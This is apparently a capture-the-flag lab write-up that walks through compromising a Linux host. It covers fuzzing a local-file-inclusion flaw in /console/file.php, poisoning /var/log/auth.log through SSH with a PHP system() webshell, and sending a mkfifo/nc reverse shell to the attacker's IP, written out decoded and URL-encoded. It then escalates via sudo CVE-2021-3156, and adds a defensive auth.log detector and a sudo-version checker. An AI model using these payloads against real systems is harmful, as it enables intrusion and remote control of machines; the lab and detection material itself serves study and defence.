Target IP: 192.168.170.80
Only two TCP ports are open on this machine: SSH and HTTP. I will start my enumeration with the HTTP application.
Port 80: HTTP
We are presented with the webpage above. Reviewing the page source did not turn up anything useful, and searching the page for parameters or other input points came up empty as well.
The nikto scan above reports two directories: /console and /images.
The directory brute-force finds only those same two directories, nothing beyond what nikto already reported.
/console/ sounds interesting: it contains a file called file.php. Since the page takes no visible parameter, I fuzzed parameter names, supplying a traversal payload as the value so that a hit would show up as file content: ffuf -u http://192.168.170.80/console/file.php?FUZZ=../../../../../../etc/passwd -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -fs 0 (the -fs 0 drops the zero-length responses returned for parameter names the script ignores). It worked: there is a parameter called file that is vulnerable to directory traversal and local file inclusion (LFI).
Using the command ffuf -u http://192.168.170.80/console/file.php?file=FUZZ -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -fs 0, I enumerated which of the LFI wordlist payloads actually return file content, again filtering out the responses with no output.
Next I looked for a log file I could poison to turn the LFI into RCE, using ffuf -u http://192.168.170.80/console/file.php?file=../../../../../../../../../../../../../FUZZ -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt:FUZZ -fs 0 | grep ".log". This showed that /var/log/auth.log is readable through the LFI. auth.log records every successful and failed authentication attempt on the host, including the username supplied on SSH logins, and that attacker-controlled username is what makes the file poisonable.
I will now poison /var/log/auth.log to gain RCE.
Running ssh '<?php echo system($_GET['cmd']);?>'@192.168.170.80 makes sshd log a failed login for a user named after the PHP snippet, which lands the snippet in auth.log. One quoting caveat: the shell strips the single quotes from that argument, so the username actually sent and logged is <?php echo system($_GET[cmd]);?>. PHP 7 still resolves the bare word cmd to the string 'cmd' (with a warning), so the payload works; PHP 8 would throw an Error for the undefined constant, in which case the whole user@host argument should be double-quoted with the dollar sign escaped so the inner quotes survive.
And it worked: browsing to http://192.168.170.80/console/file.php?file=/var/log/auth.log&cmd=ls;id;whoami shows the output of ls, id and whoami, because file.php includes the log file and PHP executes the injected code it now contains. Time to get a reverse shell.
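From the defender's side, the poisoning step above leaves a very recognisable artefact: OpenSSH writes the unauthenticated username verbatim into auth.log ("Invalid user <name> from <ip> port <port>"), so a PHP tag or superglobal in that field is a strong signal that someone is staging an LFI-to-RCE chain. The following detection is an added example and is not part of the original write-up; the log lines are constructed for it (the attacker and target addresses match the write-up, the timestamps, PIDs and ports are invented).

```shell
#!/bin/sh
# Added example (not from the original write-up): flag SSH log-poisoning attempts in
# auth.log by inspecting the username field of "Invalid user" records.

# Constructed sample of /var/log/auth.log for this example. Line 4 carries the
# poisoning payload exactly as the shell hands it to ssh (inner quotes stripped);
# line 6 is an unrelated junk username that must NOT be reported.
sample_auth_log() {
cat <<'EOF'
May  4 10:01:12 target sshd[1201]: Accepted password for kali from 192.168.45.211 port 51234 ssh2
May  4 10:02:40 target sshd[1210]: Invalid user admin from 192.168.45.211 port 51240
May  4 10:02:41 target sshd[1210]: Failed password for invalid user admin from 192.168.45.211 port 51240 ssh2
May  4 10:03:05 target sshd[1222]: Invalid user <?php echo system($_GET[cmd]);?> from 192.168.45.211 port 51250
May  4 10:03:06 target sshd[1222]: Connection closed by invalid user <?php echo system($_GET[cmd]);?> 192.168.45.211 port 51250 [preauth]
May  4 10:05:00 target sshd[1230]: Invalid user "><script>alert(1)</script> from 10.0.0.9 port 40000
EOF
}

# Read auth.log lines on stdin; print "<source ip><TAB><username>" for every
# "Invalid user" record whose username carries PHP code (open tag, a request
# superglobal, or a command-execution function call). Exit status is 0 when at
# least one record matched and 1 otherwise, so it can drive an alert or a cron job.
find_poisoned_logins() {
    awk '
        /sshd\[[0-9]+\]: Invalid user / {
            # Username is everything between "Invalid user " and the LAST " from <ip> port <n>",
            # so usernames containing spaces (like a PHP snippet) are kept whole.
            if (match($0, /Invalid user .* from [0-9.]+ port [0-9]+/)) {
                rec = substr($0, RSTART, RLENGTH)
                sub(/^Invalid user /, "", rec)
                user = rec
                sub(/ from [0-9.]+ port [0-9]+$/, "", user)
                ip = rec
                sub(/^.* from /, "", ip)
                sub(/ port [0-9]+$/, "", ip)
                if (user ~ /<\?(php|=)|\$_(GET|POST|REQUEST|COOKIE)\[|(system|passthru|shell_exec|exec|eval)\(/) {
                    print ip "\t" user
                    hits++
                }
            }
        }
        END { if (hits > 0) exit 0; exit 1 }
    '
}

# Usage on a live box: find_poisoned_logins < /var/log/auth.log
# Demo on the constructed sample:
sample_auth_log | find_poisoned_logins
```

The awk filter keys only on the "Invalid user" record, not on the "Connection closed by invalid user" follow-up, so each attempt is reported once; an alerting pipeline would additionally want to check whether the web server's PHP can read auth.log at all, since on a default Ubuntu install the file is adm-group readable and that is what makes the poisoned line reachable through an include.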
I started a listener on port 80 and requested the full URL below. The command is percent-encoded so that the shell metacharacters in it (spaces, ;, |, > and especially &, which would otherwise terminate the cmd parameter) survive the query string intact. A reverse shell connected back to my host.
Decoded command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.45.211 80 >/tmp/f
URL-encoded payload: rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.211%2080%20%3E%2Ftmp%2Ff
Full URL with URL-encoded payload: http://192.168.170.80/console/file.php?file=/var/log/auth.log&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.211%2080%20%3E%2Ftmp%2Ff
Time to escalate privileges.
The enumeration output suggests a misconfiguration involving systemctl.
Hmmm... but there is a quicker route. The installed sudo is version 1.8.21p2, which falls inside the range affected by CVE-2021-3156 (Baron Samedit: affected releases are 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1, fixed in 1.9.5p2). A fast way to confirm without relying on the version string alone, since distributions sometimes backport the fix, is to run sudoedit -s / as an unprivileged user: a vulnerable build answers "sudoedit: /: not a regular file", a patched one prints its usage text. I used a public exploit for this CVE.
And this was successful! Now I am root.
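Checking a sudo version against the CVE-2021-3156 ranges by eye is easy to get wrong because of the pN suffixes (1.8.31p2 is affected, 1.9.5p2 is not). The helper below is an added example and not part of the original write-up; it normalises a version string such as "1.8.21p2" into a comparable integer, tests it against both affected ranges, and wraps the sudoedit behavioural probe described in the Qualys advisory. The function names are mine.

```shell
#!/bin/sh
# Added example (not from the original write-up): decide whether a sudo version
# string falls in the CVE-2021-3156 (Baron Samedit) affected ranges.

# "1.8.21p2" -> 1008021002 ; "1.9.5" -> 1009005000 (a missing pN suffix counts as p0).
# Fields are split on both "." and "p" so the patch level becomes a fourth component.
sudo_version_num() {
    printf '%s' "$1" | awk -F'[.p]' '{
        printf "%d", $1 * 1000000000 + $2 * 1000000 + $3 * 1000 + ($4 == "" ? 0 : $4)
    }'
}

# Return 0 (true) if the version is in an affected range:
#   legacy branch 1.8.2 .. 1.8.31p2, stable branch 1.9.0 .. 1.9.5p1 ; fixed in 1.9.5p2.
sudo_is_baron_samedit_vuln() {
    v=$(sudo_version_num "$1")
    if [ "$v" -ge "$(sudo_version_num 1.8.2)" ] && [ "$v" -le "$(sudo_version_num 1.8.31p2)" ]; then
        return 0
    fi
    if [ "$v" -ge "$(sudo_version_num 1.9.0)" ] && [ "$v" -le "$(sudo_version_num 1.9.5p1)" ]; then
        return 0
    fi
    return 1
}

# Pull the upstream version out of "Sudo version X.Y.ZpN" (first line of sudo -V).
installed_sudo_version() {
    sudo -V 2>/dev/null | awk 'NR == 1 { print $3 }'
}

# Behavioural probe from the advisory: a vulnerable sudoedit complains
# "sudoedit: /: not a regular file" before any authentication; a patched build
# prints its usage text instead. Works as any unprivileged user. Return 0 if vulnerable.
sudoedit_probe() {
    sudoedit -s / 2>&1 | grep -q 'not a regular file'
}

# Usage (prints one verdict line; never exits non-zero so it is safe in enumeration scripts):
if [ "${1:-}" = "--check" ]; then
    ver=$(installed_sudo_version)
    if sudo_is_baron_samedit_vuln "$ver"; then
        printf 'sudo %s: version in CVE-2021-3156 range\n' "$ver"
    else
        printf 'sudo %s: version outside CVE-2021-3156 range\n' "$ver"
    fi
    if sudoedit_probe; then
        printf 'sudoedit -s / probe: VULNERABLE behaviour\n'
    else
        printf 'sudoedit -s / probe: patched behaviour\n'
    fi
fi
```

Trust the probe over the version string when they disagree: a distribution package can carry the fix under an unchanged upstream version, and the reverse (a rebuilt vulnerable binary with a newer version string) is possible too.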
The local.txt flag, read once I had gained a foothold on the machine.
The proof.txt flag, read once I had exploited the vulnerable sudo binary.